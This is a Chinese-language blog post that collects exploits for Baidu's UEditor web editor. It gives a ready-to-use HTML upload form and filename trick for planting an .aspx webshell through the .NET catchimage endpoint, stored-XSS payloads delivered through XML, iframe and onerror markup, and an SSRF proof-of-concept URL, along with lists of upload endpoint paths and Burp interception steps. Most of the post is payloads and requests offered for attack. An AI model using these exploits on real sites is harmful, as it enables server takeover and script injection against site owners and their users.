百度Ueditor编辑器漏洞集合

知识大全 3年前 (2021) Jie
820 0 0

漏洞(一):net.版本1.4.3文件上传

http://domain/controller.ashx?action=catchimage  参数为catchimage,

case:”catchimage”,这里会实例化类,在具体实现文件上传的类的方法里只验证了content-type类型

<form action="http://xx.com/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
<p>shell addr: <input type="text" name="source[]" /></p>
<input type="submit" value="Submit" />
</form>

需准备一个图片马儿,远程shell地址需要指定扩展名为 1.gif?.aspx

远程抓图片然后使用?.aspx 作为后辍,因为后辍是通过截断 . 来获取的后端验证方式是ContentType图片默认的格式就是image/jpeg

漏洞(二):XML文件上传导致存储型XSS

----------------------------------------

上传路径如下

/ueditor/index.html/ueditor/asp/controller.asp?action=uploadimage/ueditor/asp/controller.asp?action=uploadfile/ueditor/net/controller.ashx?action=uploadimage/ueditor/net/controller.ashx?action=uploadfile/ueditor/php/controller.php?action=uploadfile/ueditor/php/controller.php?action=uploadimage/ueditor/jsp/controller.jsp?action=uploadfile/ueditor/jsp/controller.jsp?action=uploadimage
1,点击上传
百度Ueditor编辑器漏洞集合
上传内容如下

<html><head></head><body><something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1);</something:script></body></html>

2,buprsuit抓包拦截

3,将uploadimage类型改为uploadfile,此时进方法为uploadfile,执行文件上传的操作,并修改文件后缀名为xml,最后复制上xml代码即可

4,访问listfile方法,http://domain/ueditor/php/controller.php?action=listfile即可查看文件的返回路径

5,访问上传的url文件,触发payload

 

漏洞(三):SSRF漏洞

----------------------------------------

 

1.该漏洞存在于1.4.3的jsp版本中。但1.4.3.1版本已经修复了该漏洞。

已知该版本ueditor的ssrf触发点:

 

/jsp/controller.jsp?action=catchimage&source[]=/jsp/getRemoteImage.jsp?upfile=/php/controller.php?action=catchimage&source[]=

2.构造poc

http://domain/cmd/ueditor/jsp/controller.jsp?action=catchimage&source[]=https://domain/filename
百度Ueditor编辑器漏洞集合

 

 

漏洞(四):上传存储型xss漏洞 

----------------------------------------

1,没有过滤iframe 2016-12-22

poc 如下

<iframe src=”javascript:alert(1)”></iframe>

百度Ueditor编辑器漏洞集合

 

2,1.4.3版本

任意编辑内容,burp抓包替换如下即可

%3Cp%3E1111111"><ImG sRc=1 OnErRoR=prompt(1)>%3Cbr%2F%3E%3C%2Fp%3E

 

百度Ueditor编辑器漏洞集合

 

 

版权声明:Jie 发表于 2021年9月25日 pm12:25。
转载请注明:百度Ueditor编辑器漏洞集合 | 黑客街

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...